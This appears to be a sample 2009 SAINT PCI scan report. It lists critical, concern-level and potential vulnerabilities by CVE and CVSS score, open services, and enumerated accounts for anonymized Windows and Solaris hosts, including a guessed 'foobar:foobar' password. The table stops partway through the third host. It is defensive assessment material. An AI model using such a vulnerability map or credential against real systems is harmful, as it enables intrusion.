
July 8, 2009

1.0  Introduction

SAINT has determined that the customer is not globally PCI compliant with the PCI scan validation requirement. The scan was conducted on June 29, 2009, at 3:01 PM, as a heavy vulnerability assessment using the SAINT® 7.0 vulnerability scanner. The scan discovered a total of five live hosts, and detected 42 critical problems, 94 areas of concern, and 110 potential problems. The hosts and problems detected are discussed in greater detail in the following sections. This report was generated by a PCI Approved Scanning Vendor, SAINT Corporation, under certificate number 4268-01-02, within the guidelines of the PCI data security initiative.

2.0  Overview

The following vulnerability severity levels are used to categorize the vulnerabilities:

CRITICAL PROBLEMS
Vulnerabilities which pose an immediate threat to the network by allowing a remote attacker to directly gain read or write access, execute commands on the target, or create a denial of service.

AREAS OF CONCERN
Vulnerabilities which do not directly allow remote access, but do allow privilege elevation attacks, attacks on other targets using the vulnerable host as an intermediary, or gathering of passwords or configuration information which could be used to plan an attack.

POTENTIAL PROBLEMS
Warnings which may or may not be vulnerabilities, depending upon the patch level or configuration of the target. Further investigation on the part of the system administrator may be necessary.

SERVICES
Network services which accept client connections on a given TCP or UDP port. This is simply a count of network services, and does not imply that the service is or is not vulnerable.

The following tables present an overview of the hosts discovered on the network and the vulnerabilities contained therein.

2.1  Vulnerability List

This table presents an overview of the vulnerabilities detected on the network.


Host Name | Severity | Vulnerability / Service | Class | CVE | CVSSv2 Base Score | PCI Compliant?
host1.domain.com | critical | Download.Ject detected on web server | Other | | | no
host1.domain.com | critical | Guessed password to windows account (foobar:foobar) | Passwords | | | no
host1.domain.com | critical | MS FrontPage Server Extension Vulnerability: /_vti_bin/shtml.dll | Web | CVE-2003-0824 | 5.0 | no
host1.domain.com | critical | MS FrontPage Server Extension Vulnerability: remote debug | Web | CVE-2003-0822 | 7.5 | no
host1.domain.com | critical | Folder traversal in IIS (Double Decoding) | Web | CVE-2001-0333 | 7.5 | no
host1.domain.com | critical | Folder traversal in IIS (Unicode Translation) | Web | CVE-2000-0884 | 7.5 | no
host1.domain.com | critical | vulnerabilities in IIS 5 | Web | CVE-2000-0770 CVE-2001-0151 CVE-2001-0241 CVE-2001-0500 CVE-2001-0507 CVE-2002-0869 CVE-2002-1180 CVE-2002-1181 CVE-2002-1182 CVE-2003-0223 CVE-2003-0224 CVE-2003-0225 CVE-2003-0226 | 10.0 | yes
host1.domain.com | critical | MailEnable HTTPMail vulnerability | Mail | CVE-2005-1348 CVE-2005-2222 CVE-2006-1338 | 10.0 | yes
host1.domain.com | critical | MS Site Server default account | Other | CVE-2002-1769 CVE-2002-2073 CVE-2002-2081 | 7.5 | no
host1.domain.com | critical | vulnerability in Windows Media Services (nsiislog.dll) | Web | CVE-2003-0227 CVE-2003-0349 | 7.5 | no
host1.domain.com | critical | Windows Plug and Play vulnerability | Windows OS | CVE-2005-1983 | 10.0 | no
host1.domain.com | critical | RPC runtime library vulnerability | Windows OS | CVE-2003-0807 CVE-2003-0813 CVE-2004-0116 CVE-2004-0124 | 5.1 | no
host1.domain.com | critical | Windows 2000 ASN1 buffer overflow | Windows OS | CVE-2003-0818 | 7.5 | no
host1.domain.com | critical | Windows 2000 RPC buffer overflow | Windows OS | CVE-2003-0352 | 7.5 | no
host1.domain.com | critical | Windows COM+ command execution vulnerability | Windows OS | CVE-2005-1978 CVE-2005-1979 CVE-2005-1980 CVE-2005-2119 | 7.5 | no
host1.domain.com | critical | Windows SMB Transaction response buffer overflow | Windows OS | CVE-2005-0045 | 7.5 | no
host1.domain.com | critical | Windows SMB input validation vulnerability | Windows OS | CVE-2005-1206 | 7.5 | no
host1.domain.com | critical | Windows TCP/IP vulnerabilities | Windows OS | CVE-2004-0230 CVE-2004-0790 CVE-2004-1060 CVE-2005-0048 CVE-2005-0688 | 7.5 | yes
host1.domain.com | critical | Windows WMF gdi32.dll vulnerability | Windows OS | CVE-2005-4560 | 7.5 | no
host1.domain.com | critical | pointer corruption vulnerability in WINS replication service | Windows OS | CVE-2004-0567 CVE-2004-1080 | 10.0 | no
host1.domain.com | critical | Worm detected (Code Red II) | Other | | | no
host1.domain.com | concern | Web server allows cross-site tracing | Web | | | yes
host1.domain.com | concern | Windows DNS server allows cache poisoning | DNS | CVE-2001-1452 | 5.0 | no
host1.domain.com | concern | Internet Explorer COM object memory corruption | Windows OS | CVE-2005-2127 | 7.5 | no
host1.domain.com | concern | Internet Explorer Create Text Range code injection | Windows OS | CVE-2006-1185 CVE-2006-1186 CVE-2006-1188 CVE-2006-1189 CVE-2006-1190 CVE-2006-1191 CVE-2006-1192 CVE-2006-1245 CVE-2006-1359 CVE-2006-1388 | 10.0 | no
host1.domain.com | concern | Internet Explorer JPEG buffer overflow | Windows OS | CVE-2005-1988 CVE-2005-1989 CVE-2005-1990 | 7.5 | no
host1.domain.com | concern | Internet Explorer JS stack overflow | Windows OS | CVE-2006-0753 CVE-2006-0830 | 7.5 | no
host1.domain.com | concern | Internet Explorer JavaScript vulnerability | Windows OS | CVE-2005-1790 CVE-2005-2829 CVE-2005-2830 CVE-2005-2831 | 7.5 | no
host1.domain.com | concern | Internet Explorer PNG buffer overflow | Windows OS | CVE-2002-0648 CVE-2005-1211 | 5.1 | no
host1.domain.com | concern | Internet Explorer URL parsing buffer overflow | Windows OS | CVE-2005-0553 CVE-2005-0554 CVE-2005-0555 | 7.5 | no
host1.domain.com | concern | Internet Explorer WMF handling vulnerability | Windows OS | CVE-2006-0020 | 9.3 | no
host1.domain.com | concern | vulnerability in License Logging Service | Windows OS | CVE-2005-0050 | 7.5 | no
host1.domain.com | concern | AxWebRemoveCtrl ActiveX control enabled | Web | CVE-2005-3693 | 9.3 | no
host1.domain.com | concern | CodeSupport ActiveX control enabled | Web | CVE-2005-3650 | 9.3 | no
host1.domain.com | concern | null session access using alternate pipes | Windows OS | CVE-2005-2150 | 5.0 | no
host1.domain.com | concern | Windows Plug and Play privilege elevation | Windows OS | CVE-2005-2120 | 6.5 | no
host1.domain.com | concern | Run key allows write access | Windows OS | CVE-1999-0589 | 10.0 | no
host1.domain.com | concern | Uninstall key allows write access | Windows OS | CVE-1999-0589 | 10.0 | no
host1.domain.com | concern | Windows telephony service vulnerability | Windows OS | CVE-2005-0058 | 7.5 | no
host1.domain.com | concern | DirectShow buffer overflow | Windows OS | CVE-2005-2128 | 5.0 | no
host1.domain.com | concern | HTML Application Host vulnerability in Windows shell | Windows OS | CVE-2005-0063 | 7.5 | no
host1.domain.com | concern | Microsoft Color Management Module buffer overflow | Windows OS | CVE-2005-1219 | 7.5 | no
host1.domain.com | concern | Microsoft Data Access Component vulnerability | Windows OS | CVE-2006-0003 | 5.1 | no
host1.domain.com | concern | Windows DHTML Editing Component vulnerability | Windows OS | CVE-2004-1319 | 5.0 | no
host1.domain.com | concern | Windows Explorer COM object command execution | Windows OS | CVE-2004-2289 CVE-2006-0012 | 10.0 | no
host1.domain.com | concern | Windows Hyperlink Object Library buffer overflow | Windows OS | CVE-2005-0057 | 7.5 | no
host1.domain.com | concern | Windows Kernel privilege elevation vulnerability | Windows OS | CVE-2005-2827 | 7.2 | no
host1.domain.com | concern | Windows Media Player plug-in EMBED vulnerability | Windows OS | CVE-2006-0005 | 9.3 | no
host1.domain.com | concern | Windows Web Fonts vulnerability | Windows OS | CVE-2006-0010 | 7.5 | no
host1.domain.com | concern | Windows shortcut file command execution | Windows OS | CVE-2005-2117 CVE-2005-2118 CVE-2005-2122 | 10.0 | no
host1.domain.com | concern | vulnerable WinZip version: 8.0 | Other | CVE-2001-0449 CVE-2004-1465 | 4.6 | no
host1.domain.com | potential | guessable read community string | Networking/SNMP | CVE-1999-0516 CVE-1999-0517 | 7.5 | no
host1.domain.com | potential | Internet Explorer Shell.Explorer object enabled | Windows OS | CVE-2004-0985 | 10.0 | no
host1.domain.com | potential | Javaprxy.dll access through Internet Explorer | Windows OS | CVE-2005-2087 | 5.0 | no
host1.domain.com | potential | last user name shown in login box | Windows OS | CVE-1999-0592 | 10.0 | no
host1.domain.com | potential | MailEnable Enterprise 1.04 may be vulnerable | Mail | CVE-2005-1013 CVE-2005-1781 CVE-2005-2223 | 5.0 | no
host1.domain.com | potential | possible vulnerability in MailEnable Enterprise IMAP 1.04 | Mail | CVE-2005-1014 CVE-2005-1015 CVE-2005-2278 CVE-2005-3155 CVE-2005-3690 CVE-2005-3691 CVE-2005-3813 CVE-2005-3993 CVE-2005-4402 CVE-2005-4456 CVE-2005-4457 CVE-2006-0504 | 10.0 | no
host1.domain.com | potential | possible vulnerability in MailEnable Enterprise POP3 1.04 | Mail | CVE-2006-1337 | 7.5 | no
host1.domain.com | potential | possible vulnerability in MailEnable POP3 0 | Mail | | | yes
host1.domain.com | potential | excessive null session access | Windows OS | CVE-2000-1200 | 5.0 | no
host1.domain.com | potential | Possible ODBC RDS Vulnerability | Web | CVE-1999-1011 CVE-2002-1142 | 10.0 | no
host1.domain.com | potential | chargen could be used in UDP bomb | Networking/SNMP | CVE-1999-0103 | 5.0 | no
host1.domain.com | potential | pop receives password in clear | Mail | | | yes
host1.domain.com | potential | possible vulnerability in PPTP service | Other | CVE-2002-1214 | 7.5 | no
host1.domain.com | potential | SNMP is enabled and may be vulnerable | Networking/SNMP | CVE-1999-0615 CVE-2002-0012 CVE-2002-0013 CVE-2002-0053 CVE-2002-0796 CVE-2002-0797 | 10.0 | no
host1.domain.com | potential | TCP reset using approximate sequence number | Other | CVE-2004-0230 | 5.0 | no
host1.domain.com | potential | password complexity policy disabled | Windows OS | CVE-1999-0535 | 10.0 | no
host1.domain.com | potential | weak account lockout policy (0) | Windows OS | CVE-1999-0582 | 5.0 | no
host1.domain.com | potential | weak minimum password age policy (0 days) | Windows OS | CVE-1999-0535 | 10.0 | no
host1.domain.com | potential | weak minimum password length policy (0) | Windows OS | CVE-1999-0535 | 10.0 | no
host1.domain.com | potential | weak password history policy (0) | Windows OS | CVE-1999-0535 | 10.0 | no
host1.domain.com | potential | non-administrative users can act as part of the operating system | Windows OS | CVE-1999-0534 | 4.6 | no
host1.domain.com | potential | non-administrative users can bypass traverse checking | Windows OS | CVE-1999-0534 | 4.6 | no
host1.domain.com | potential | non-administrative users can create token object | Windows OS | CVE-1999-0534 | 4.6 | no
host1.domain.com | potential | auditing is disabled | Windows OS | CVE-1999-0575 | 7.5 | no
host1.domain.com | potential | Password never expires for user LDAP_Anonymous | Windows OS | | | yes
host1.domain.com | potential | Password never expires for user foobar | Windows OS | | | no
host1.domain.com | potential | Client Service for Netware vulnerability | Windows OS | CVE-2005-1985 | 7.5 | no
host1.domain.com | potential | Collaboration Data Objects vulnerability | Windows OS | CVE-2005-1987 | 7.5 | no
host1.domain.com | potential | FTP Client vulnerability | Windows OS | CVE-2005-2126 | 2.6 | yes
host1.domain.com | potential | Jet Database Engine input validation problems | Windows OS | CVE-2005-0944 | 7.5 | no
host1.domain.com | potential | Microsoft Agent spoofing vulnerability | Windows OS | CVE-2005-1214 | 5.1 | no
host1.domain.com | potential | Network Connection Manager vulnerability | Windows OS | CVE-2005-2307 | 5.0 | no
host1.domain.com | potential | Win2000 SP2 Security Rollup 1 not installed | Windows OS | CVE-1999-0662 | 10.0 | no
host1.domain.com | potential | Windows 2000 SP4 Update Rollup 1 not applied | Windows OS | CVE-2005-3168 CVE-2005-3169 CVE-2005-3170 CVE-2005-3171 CVE-2005-3172 CVE-2005-3173 CVE-2005-3174 CVE-2005-3175 CVE-2005-3176 CVE-2005-3177 | 7.5 | no
host1.domain.com | potential | Windows Media Player URL script execution | Windows OS | CVE-2003-1107 | 5.1 | no
host1.domain.com | potential | potential vulnerability in WINS | Windows OS | CVE-2003-0825 | 7.5 | no
host1.domain.com | service | 17/TCP | | | |
host1.domain.com | service | 17/UDP | | | |
host1.domain.com | service | 42/TCP | | | |
host1.domain.com | service | 1027/TCP | | | |
host1.domain.com | service | 1028/TCP | | | |
host1.domain.com | service | 1031/UDP | | | |
host1.domain.com | service | 1033/TCP | | | |
host1.domain.com | service | 1035/UDP | | | |
host1.domain.com | service | 1036/TCP | | | |
host1.domain.com | service | 1037/UDP | | | |
host1.domain.com | service | 1038/TCP | | | |
host1.domain.com | service | 1039/TCP | | | |
host1.domain.com | service | 1041/UDP | | | |
host1.domain.com | service | 1043/UDP | | | |
host1.domain.com | service | 1645/UDP | | | |
host1.domain.com | service | 1646/UDP | | | |
host1.domain.com | service | 1701/UDP | | | |
host1.domain.com | service | 1723/TCP | | | |
host1.domain.com | service | 1755/TCP | | | |
host1.domain.com | service | 1755/UDP | | | |
host1.domain.com | service | 1813/UDP | | | |
host1.domain.com | service | 3372/TCP | | | |
host1.domain.com | service | 6666/TCP | | | |
host1.domain.com | service | 7007/TCP | | | |
host1.domain.com | service | 7778/TCP | | | |
host1.domain.com | service | 8081/TCP | | | |
host1.domain.com | service | DNS | | | |
host1.domain.com | service | IMAP | | | |
host1.domain.com | service | POP | | | |
host1.domain.com | service | SMB | | | |
host1.domain.com | service | SMTP | | | |
host1.domain.com | service | SNMP | | | |
host1.domain.com | service | WWW | | | |
host1.domain.com | service | WWW (Secure) | | | |
host1.domain.com | service | WWW (non-standard port 8080) | | | |
host1.domain.com | service | bootpc (68/UDP) | | | |
host1.domain.com | service | bootps (67/UDP) | | | |
host1.domain.com | service | chargen (19/TCP) | | | |
host1.domain.com | service | chargen:UDP (19/UDP) | | | |
host1.domain.com | service | daytime (13/TCP) | | | |
host1.domain.com | service | daytime (13/UDP) | | | |
host1.domain.com | service | discard (9/TCP) | | | |
host1.domain.com | service | discard (9/UDP) | | | |
host1.domain.com | service | domain (53/TCP) | | | |
host1.domain.com | service | domain (53/UDP) | | | |
host1.domain.com | service | echo (7/TCP) | | | |
host1.domain.com | service | echo (7/UDP) | | | |
host1.domain.com | service | epmap (135/TCP) | | | |
host1.domain.com | service | epmap (135/UDP) | | | |
host1.domain.com | service | isakmp (500/UDP) | | | |
host1.domain.com | service | microsoft-ds (445/TCP) | | | |
host1.domain.com | service | microsoft-ds (445/UDP) | | | |
host1.domain.com | service | name (42/UDP) | | | |
host1.domain.com | service | netbios-dgm (138/UDP) | | | |
host1.domain.com | service | netbios-ns (137/UDP) | | | |
host1.domain.com | service | printer (515/TCP) | | | |
host1.domain.com | service | radius (1812/UDP) | | | |
host1.domain.com | info | User: Administrator | | | |
host1.domain.com | info | User: DHCP Administrators | | | |
host1.domain.com | info | User: DHCP Users | | | |
host1.domain.com | info | User: Guest | | | |
host1.domain.com | info | User: IME_ADMIN | | | |
host1.domain.com | info | User: IME_USER | | | |
host1.domain.com | info | User: IUSR_HOST1 | | | |
host1.domain.com | info | User: IWAM_HOST1 | | | |
host1.domain.com | info | User: LDAP_Anonymous | | | |
host1.domain.com | info | User: NetShow Administrators | | | |
host1.domain.com | info | User: NetShowServices | | | |
host1.domain.com | info | User: TsInternetUser | | | |
host1.domain.com | info | User: WINS Users | | | |
host1.domain.com | info | User: foobar | | | |
host1.domain.com | info | Windows service: Alerter | | | |
host1.domain.com | info | Windows service: COM+ Event System | | | |
host1.domain.com | info | Windows service: Computer Browser | | | |
host1.domain.com | info | Windows service: DHCP Client | | | |
host1.domain.com | info | Windows service: DHCP Server | | | |
host1.domain.com | info | Windows service: DNS Client | | | |
host1.domain.com | info | Windows service: DNS Server | | | |
host1.domain.com | info | Windows service: Distributed File System | | | |
host1.domain.com | info | Windows service: Distributed Link Tracking Client | | | |
host1.domain.com | info | Windows service: Distributed Transaction Coordinator | | | |
host1.domain.com | info | Windows service: Event Log | | | |
host1.domain.com | info | Windows service: FTP Publishing Service | | | |
host1.domain.com | info | Windows service: IIS Admin Service | | | |
host1.domain.com | info | Windows service: IPSEC Policy Agent | | | |
host1.domain.com | info | Windows service: Internet Authentication Service | | | |
host1.domain.com | info | Windows service: License Logging Service | | | |
host1.domain.com | info | Windows service: Logical Disk Manager | | | |
host1.domain.com | info | Windows service: MailEnable HTTPMail Service | | | |
host1.domain.com | info | Windows service: MailEnable IMAP Service | | | |
host1.domain.com | info | Windows service: MailEnable List Connector | | | |
host1.domain.com | info | Windows service: MailEnable Mail Transfer Agent | | | |
host1.domain.com | info | Windows service: MailEnable Management Service | | | |
host1.domain.com | info | Windows service: MailEnable POP Connector | | | |
host1.domain.com | info | Windows service: MailEnable POP Service | | | |
host1.domain.com | info | Windows service: MailEnable Postoffice Connector | | | |
host1.domain.com | info | Windows service: MailEnable SMTP Connector | | | |
host1.domain.com | info | Windows service: Messenger | | | |
host1.domain.com | info | Windows service: NT LM Security Support Provider | | | |
host1.domain.com | info | Windows service: Net Logon | | | |
host1.domain.com | info | Windows service: Plug and Play | | | |
host1.domain.com | info | Windows service: Print Server for Macintosh | | | |
host1.domain.com | info | Windows service: Print Spooler | | | |
host1.domain.com | info | Windows service: Protected Storage | | | |
host1.domain.com | info | Windows service: Remote Access Connection Manager | | | |
host1.domain.com | info | Windows service: Remote Procedure Call (RPC) | | | |
host1.domain.com | info | Windows service: Remote Registry Service | | | |
host1.domain.com | info | Windows service: Removable Storage | | | |
host1.domain.com | info | Windows service: Routing and Remote Access | | | |
host1.domain.com | info | Windows service: RunAs Service | | | |
host1.domain.com | info | Windows service: SNMP Service | | | |
host1.domain.com | info | Windows service: Security Accounts Manager | | | |
host1.domain.com | info | Windows service: Server | | | |
host1.domain.com | info | Windows service: Simple Mail Transport Protocol (SMTP) | | | |
host1.domain.com | info | Windows service: Simple TCP/IP Services | | | |
host1.domain.com | info | Windows service: System Event Notification | | | |
host1.domain.com | info | Windows service: TCP/IP NetBIOS Helper Service | | | |
host1.domain.com | info | Windows service: TCP/IP Print Server | | | |
host1.domain.com | info | Windows service: Task Scheduler | | | |
host1.domain.com | info | Windows service: Telephony | | | |
host1.domain.com | info | Windows service: Windows Internet Name Service (WINS) | | | |
host1.domain.com | info | Windows service: Windows Management Instrumentation | | | |
host1.domain.com | info | Windows service: Windows Management Instrumentation Driver Extensions | | | |
host1.domain.com | info | Windows service: Windows Media Monitor Service | | | |
host1.domain.com | info | Windows service: Windows Media Program Service | | | |
host1.domain.com | info | Windows service: Windows Media Station Service | | | |
host1.domain.com | info | Windows service: Windows Media Unicast Service | | | |
host1.domain.com | info | Windows service: Windows Time | | | |
host1.domain.com | info | Windows service: Workstation | | | |
host1.domain.com | info | Windows service: World Wide Web Publishing Service | | | |
host2.domain.com | critical | Guessed password to windows account (foobar:foobar) | Passwords | | | no
host2.domain.com | critical | Windows print spooler vulnerability | Print Services | CVE-2005-1984 | 7.5 | yes
host2.domain.com | critical | RPC runtime library vulnerability | Windows OS | CVE-2003-0807 CVE-2003-0813 CVE-2004-0116 CVE-2004-0124 | 5.1 | no
host2.domain.com | critical | Win2003 RPC buffer overflow | Windows OS | CVE-2003-0352 | 7.5 | no
host2.domain.com | critical | Windows SMB Transaction response buffer overflow | Windows OS | CVE-2005-0045 | 7.5 | no
host2.domain.com | critical | Windows SMB input validation vulnerability | Windows OS | CVE-2005-1206 | 7.5 | no
host2.domain.com | critical | Windows TCP/IP vulnerabilities | Windows OS | CVE-2004-0230 CVE-2004-0790 CVE-2004-1060 CVE-2005-0048 CVE-2005-0688 | 7.5 | yes
host2.domain.com | critical | Windows WMF gdi32.dll vulnerability | Windows OS | CVE-2005-4560 | 7.5 | no
host2.domain.com | concern | Internet Explorer COM object memory corruption | Windows OS | CVE-2005-2127 | 7.5 | no
host2.domain.com | concern | Internet Explorer Create Text Range code injection | Windows OS | CVE-2006-1185 CVE-2006-1186 CVE-2006-1188 CVE-2006-1189 CVE-2006-1190 CVE-2006-1191 CVE-2006-1192 CVE-2006-1245 CVE-2006-1359 CVE-2006-1388 | 10.0 | no
host2.domain.com | concern | Internet Explorer JPEG buffer overflow | Windows OS | CVE-2005-1988 CVE-2005-1989 CVE-2005-1990 | 7.5 | no
host2.domain.com | concern | Internet Explorer JS stack overflow | Windows OS | CVE-2006-0753 CVE-2006-0830 | 7.5 | no
host2.domain.com | concern | Internet Explorer JavaScript vulnerability | Windows OS | CVE-2005-1790 CVE-2005-2829 CVE-2005-2830 CVE-2005-2831 | 7.5 | no
host2.domain.com | concern | Internet Explorer PNG buffer overflow | Windows OS | CVE-2002-0648 CVE-2005-1211 | 5.1 | no
host2.domain.com | concern | Internet Explorer URL parsing buffer overflow | Windows OS | CVE-2005-0553 CVE-2005-0554 CVE-2005-0555 | 7.5 | no
host2.domain.com | concern | Outlook Express Windows Address Book vulnerability | Mail | CVE-2006-0014 | 5.1 | no
host2.domain.com | concern | CodeSupport ActiveX control enabled | Web | CVE-2005-3650 | 9.3 | no
host2.domain.com | concern | Sunncomm ActiveX control enabled | Web | | | no
host2.domain.com | concern | Windows Plug and Play vulnerability | Windows OS | CVE-2005-1983 | 10.0 | no
host2.domain.com | concern | Run key allows write access | Windows OS | CVE-1999-0589 | 10.0 | no
host2.domain.com | concern | Uninstall key allows write access | Windows OS | CVE-1999-0589 | 10.0 | no
host2.domain.com | concern | DACL privilege elevation | Windows OS | CVE-2006-0023 | 4.3 | no
host2.domain.com | concern | DirectShow buffer overflow | Windows OS | CVE-2005-2128 | 5.0 | no
host2.domain.com | concern | Microsoft Color Management Module buffer overflow | Windows OS | CVE-2005-1219 | 7.5 | no
host2.domain.com | concern | Microsoft Data Access Component vulnerability | Windows OS | CVE-2006-0003 | 5.1 | no
host2.domain.com | concern | Windows COM+ command execution vulnerability | Windows OS | CVE-2005-1978 CVE-2005-1979 CVE-2005-1980 CVE-2005-2119 | 7.5 | no
host2.domain.com | concern | Windows EMF/WMF image file vulnerability | Windows OS | CVE-2005-0803 CVE-2005-2123 CVE-2005-2124 | 7.6 | no
host2.domain.com | concern | Windows Explorer COM object command execution | Windows OS | CVE-2004-2289 CVE-2006-0012 | 10.0 | no
host2.domain.com | concern | Windows HTML Help integer overflow | Windows OS | CVE-2005-1208 | 10.0 | no
host2.domain.com | concern | Windows Hyperlink Object Library buffer overflow | Windows OS | CVE-2005-0057 | 7.5 | no
host2.domain.com | concern | Windows Media Player PNG image vulnerability | Windows OS | CVE-2004-1244 | 7.5 | no
host2.domain.com | concern | Windows Media Player bmp buffer overflow | Windows OS | CVE-2006-0006 | 9.3 | no
host2.domain.com | concern | Windows Media Player plug-in EMBED vulnerability | Windows OS | CVE-2006-0005 | 9.3 | no
host2.domain.com | concern | Windows OLE input validation vulnerability | Windows OS | CVE-2005-0044 CVE-2005-0047 | 7.5 | no
host2.domain.com | concern | Windows Web Fonts vulnerability | Windows OS | CVE-2006-0010 | 7.5 | no
host2.domain.com | concern | Windows shortcut file command execution | Windows OS | CVE-2005-2117 CVE-2005-2118 CVE-2005-2122 | 10.0 | no
host2.domain.com | concern | Windows telnet client session variable disclosure | Windows OS | CVE-2005-1205 | 5.0 | no
host2.domain.com | potential | Internet Explorer ADODB.Stream object enabled | Windows OS | | | yes
host2.domain.com | potential | Internet Explorer Shell.Explorer object enabled | Windows OS | CVE-2004-0985 | 10.0 | no
host2.domain.com | potential | Javaprxy.dll access through Internet Explorer | Windows OS | CVE-2005-2087 | 5.0 | no
host2.domain.com | potential | last user name shown in login box | Windows OS | CVE-1999-0592 | 10.0 | no
host2.domain.com | potential | Outlook Express NNTP buffer overflow | Mail | CVE-2005-1213 | 7.5 | no
host2.domain.com | potential | User newuser has never logged in | Windows OS | | | yes
host2.domain.com | potential | password complexity policy disabled | Windows OS | CVE-1999-0535 | 10.0 | no
host2.domain.com | potential | weak account lockout policy (0) | Windows OS | CVE-1999-0582 | 5.0 | no
host2.domain.com | potential | weak minimum password age policy (0 days) | Windows OS | CVE-1999-0535 | 10.0 | no
host2.domain.com | potential | weak minimum password length policy (0) | Windows OS | CVE-1999-0535 | 10.0 | no
host2.domain.com | potential | weak password history policy (0) | Windows OS | CVE-1999-0535 | 10.0 | no
host2.domain.com | potential | non-administrative users can bypass traverse checking | Windows OS | CVE-1999-0534 | 4.6 | no
host2.domain.com | potential | non-administrative users can replace a process level token | Windows OS | CVE-1999-0534 | 4.6 | no
host2.domain.com | potential | account management auditing disabled | Windows OS | CVE-1999-0575 | 7.5 | no
host2.domain.com | potential | account management failure auditing disabled | Windows OS | CVE-1999-0575 | 7.5 | no
host2.domain.com | potential | logon failure auditing disabled | Windows OS | CVE-1999-0575 | 7.5 | no
host2.domain.com | potential | object access auditing disabled | Windows OS | CVE-1999-0575 | 7.5 | no
host2.domain.com | potential | object access failure auditing disabled | Windows OS | CVE-1999-0575 | 7.5 | no
host2.domain.com | potential | policy change auditing disabled | Windows OS | CVE-1999-0575 | 7.5 | no
host2.domain.com | potential | policy change failure auditing disabled | Windows OS | CVE-1999-0575 | 7.5 | no
host2.domain.com | potential | system event auditing disabled | Windows OS | CVE-1999-0575 | 7.5 | no
host2.domain.com | potential | system event failure auditing disabled | Windows OS | CVE-1999-0575 | 7.5 | no
host2.domain.com | potential | Password never expires for user foobar | Windows OS | | | no
host2.domain.com | potential | Windows TCP/IP Stack not hardened | Other | CVE-2005-0688 CVE-2005-1649 | 5.0 | no
host2.domain.com | potential | Client Service for Netware vulnerability | Windows OS | CVE-2005-1985 | 7.5 | no
host2.domain.com | potential | Collaboration Data Objects vulnerability | Windows OS | CVE-2005-1987 | 7.5 | no
host2.domain.com | potential | FTP Client vulnerability | Windows OS | CVE-2005-2126 | 2.6 | yes
host2.domain.com | potential | Jet Database Engine input validation problems | Windows OS | CVE-2005-0944 | 7.5 | no
host2.domain.com | potential | Microsoft Agent spoofing vulnerability | Windows OS | CVE-2005-1214 | 5.1 | no
host2.domain.com | potential | Network Connection Manager vulnerability | Windows OS | CVE-2005-2307 | 5.0 | no
host2.domain.com | potential | Windows Media Player URL script execution | Windows OS | CVE-2003-1107 | 5.1 | no
host2.domain.com | service | 33430/UDP | | | |
host2.domain.com | service | 33431/UDP | | | |
host2.domain.com | service | 33432/UDP | | | |
host2.domain.com | service | 33433/UDP | | | |
host2.domain.com | service | 33434/UDP | | | |
host2.domain.com | service | 33435/UDP | | | |
host2.domain.com | service | 33436/UDP | | | |
host2.domain.com | service | 33437/UDP | | | |
host2.domain.com | service | 1/UDP | | | |
host2.domain.com | service | 1025/TCP | | | |
host2.domain.com | service | 1026/TCP | | | |
host2.domain.com | service | SMB | | | |
host2.domain.com | service | epmap (135/TCP) | | | |
host2.domain.com | service | isakmp (500/UDP) | | | |
host2.domain.com | service | microsoft-ds (445/TCP) | | | |
host2.domain.com | service | microsoft-ds (445/UDP) | | | |
host2.domain.com | service | netbios-dgm (138/UDP) | | | |
host2.domain.com | service | netbios-ns (137/UDP) | | | |
host2.domain.com | service | ntp (123/UDP) | | | |
host2.domain.com | info | User: Administrator | | | |
host2.domain.com | info | User: Guest | | | |
host2.domain.com | info | User: HelpServicesGroup | | | |
host2.domain.com | info | User: SUPPORT_388945a0 | | | |
host2.domain.com | info | User: TelnetClients | | | |
host2.domain.com | info | User: foobar | | | |
host2.domain.com | info | User: newuser | | | |
host2.domain.com | info | Windows service: Automatic Updates | | | |
host2.domain.com | info | Windows service: COM+ Event System | | | |
host2.domain.com | info | Windows service: Computer Browser | | | |
host2.domain.com | info | Windows service: Cryptographic Services | | | |
host2.domain.com | info | Windows service: DHCP Client | | | |
host2.domain.com | info | Windows service: DNS Client | | | |
host2.domain.com | info | Windows service: Distributed File System | | | |
host2.domain.com | info | Windows service: Distributed Link Tracking Client | | | |
host2.domain.com | info | Windows service: Distributed Transaction Coordinator | | | |
host2.domain.com | info | Windows service: Error Reporting Service | | | |
host2.domain.com | info | Windows service: Event Log | | | |
host2.domain.com | info | Windows service: Help and Support | | | |
host2.domain.com | info | Windows service: IPSEC Services | | | |
host2.domain.com | info | Windows service: Logical Disk Manager | | | |
host2.domain.com | info | Windows service: MCPop3 Service | | | |
host2.domain.com | info | Windows service: MCSmtp Service | | | |
host2.domain.com | info | Windows service: Net Logon | | | |
host2.domain.com | info | Windows service: Plug and Play | | | |
host2.domain.com | info | Windows service: Print Spooler | | | |
host2.domain.com | info | Windows service: Protected Storage | | | |
host2.domain.com | info | Windows service: Remote Procedure Call (RPC) | | | |
host2.domain.com | info | Windows service: Remote Registry | | | |
host2.domain.com | info | Windows service: Secondary Logon | | | |
host2.domain.com | info | Windows service: Security Accounts Manager | | | |
host2.domain.com | info | Windows service: Server | | | |
host2.domain.com | info | Windows service: Shell Hardware Detection | | | |
host2.domain.com | info | Windows service: System Event Notification | | | |
host2.domain.com | info | Windows service: TCP/IP NetBIOS Helper | | | |
host2.domain.com | info | Windows service: Task Scheduler | | | |
host2.domain.com | info | Windows service: Terminal Services | | | |
host2.domain.com | info | Windows service: Windows Audio | | | |
host2.domain.com | info | Windows service: Windows Management Instrumentation | | | |
host2.domain.com | info | Windows service: Windows Time | | | |
host2.domain.com | info | Windows service: Wireless Configuration | | | |
host2.domain.com | info | Windows service: Workstation | | | |
host3.domain.com | critical | cachefsd may be vulnerable | RPC | CVE-2002-0033 CVE-2002-0084 | 10.0 | no
host3.domain.com | critical | Calendar Manager service may be vulnerable | RPC | CVE-1999-0320 CVE-1999-0696 | 10.0 | no
host3.domain.com | critical | possible buffer overflow in dtspcd | Other | CVE-2001-0803 | 10.0 | no
host3.domain.com | critical | rpc.walld service may be vulnerable | RPC | CVE-2002-0573 | 7.5 | no
host3.domain.com | critical | sadmind may be vulnerable to buffer overflow | RPC | CVE-1999-0977 | 10.0 | no
host3.domain.com | critical | Vulnerable Sendmail version: 8.6 | Mail | CVE-1999-0129 CVE-1999-0131 CVE-1999-0203 CVE-1999-0204 CVE-1999-1109 CVE-1999-1309 CVE-2000-0319 CVE-2002-1337 CVE-2003-0161 CVE-2003-0681 CVE-2003-0694 CVE-2006-0058 | 10.0 | no
host3.domain.com | critical | SNMP to DMI mapper may be vulnerable | Networking/SNMP | CVE-2001-0236 | 10.0 | no
host3.domain.com | critical | possible vulnerability in Sun lpd | Print Services | CVE-2001-0353 | 10.0 | no
